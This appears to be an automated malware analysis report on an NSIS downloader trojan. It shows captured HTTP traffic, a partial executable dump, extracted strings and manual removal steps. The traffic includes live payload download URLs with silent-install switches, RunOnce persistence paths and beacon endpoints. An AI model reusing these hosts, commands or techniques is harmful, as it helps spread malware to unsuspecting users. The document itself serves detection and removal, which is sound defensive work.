Location: hXXp://data.biphysics.com/r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0......


GET /r?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
 13:55:55 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..<
/font>....


GET /r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
 13:55:58 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..



GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 13:55:57 GMT
GIF89a.............!.......,...........D..;..



GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
................. ...............................................t....
.......C..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...C.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......


GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
40f..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542..http:
//mobilitydata5.com/SysInfo/tem.php?sid=83837567483..hXXp://bapo.labst
.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb2
1wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIi
OiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..http:
//software-repository.com/Generic/zgm.php?sid=8100001../install..http:
//down.eszju.cn/8001/ttwifi.exe..{5DB9279D5A0CB29AA3ED55D055708882}..h
ttps://vnl1.izabelcoin.com/vnl1.exe../PID=1670 /S..hXXp://d2xvc2nqkdua
rq.cloudfront.net/main/clc_jq.exe../c=clc /i=106 /s..hXXp://livestatsc
ounter.com/SysInfo/validator/timer.php..hXXp://livestatscounter.com/Ge
neric/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2..hXXp://dl.samplayee
dmed.com/download/dwn/firas/en/setup_mpck_en.exe../verysilent..hXXp://
down.hejie123.com/global/yeaplayer.exe..hXXp://VVV.liuzhoua.com/shangh
aiuc3.exe..hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.
xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe....0..HTTP/1.1 200 OK..
Server: nginx/1.6.2..Date: Fri, 29 Apr 2016 13:55:58 GMT..Content-Type
: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Pow
ered-By: PHP/5.5.32..40f..hXXp://mobilitydata5.com/SysInfo/countup.php
?sid=554655542..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=838375674
83..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7I
nNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInN
pbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1O
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_348:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
netc.dll
0732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Xt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp\inetc.dll
or.dll
.qeRn
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
IpConfig.dll
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
 2"332"6
`%dRH8`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
nsn18.tmp
5c092625893377a53bb4b4.exe
58C5C~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-B792-9F9E-2793-BE0B0302CDFB
jZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
1938133850
m\LOCALS~1\Temp\dloc.off
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dloc.off
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
ttp://data.biphysics.com/r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp
10732314-17
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.0

nsoA.tmp_320:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
u.Uj@
MSVCRT.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%UXn5
.jL J
#vWeB0,
.qo8KT
kRV%D
>aO.nF
k%UO^
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl23.tmp
nsl23.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
Uninstall.exe
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/countup.php?sid=554655542
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb14.tmp
dlgen.php?r=vu_vo2_
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.1

qnse20.tmp_532:

.text
`.rdata
@.data
.reloc
PPSetup.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
operator
GetProcessWindowStation
GetWindowsDirectoryW
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
4#4*4/4=4
3%3x3
;&;*;1;5;:;
reason=%i&cmd=%s
\StringFileInfo\xx\%s
Field Web Directory
hXXp://mobilitydata5.com/SysInfo/counthu.php?sid=%lld%lld%llu
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=%lld%lld%llu
NSIS_Inetc (Mozilla)
Content-Type: application/x-www-form-urlencoded
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp

nsa22.tmp_2036:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
h.hTZ
,T.UV
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%Program Files%
\System.dll
\nsExec.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsa22.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb24.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsz1D.tmp:584
    nsh16.tmp:1976
    %original file name%.exe:348
    qnse20.tmp:532
    qnse20.tmp:1764
    nsa22.tmp:2036
    nsoA.tmp:320
    Full_Setup.exe:1240

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (3342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp (2660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (37949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\t1.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (14400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (43 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\IpConfig.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm (16664 bytes)
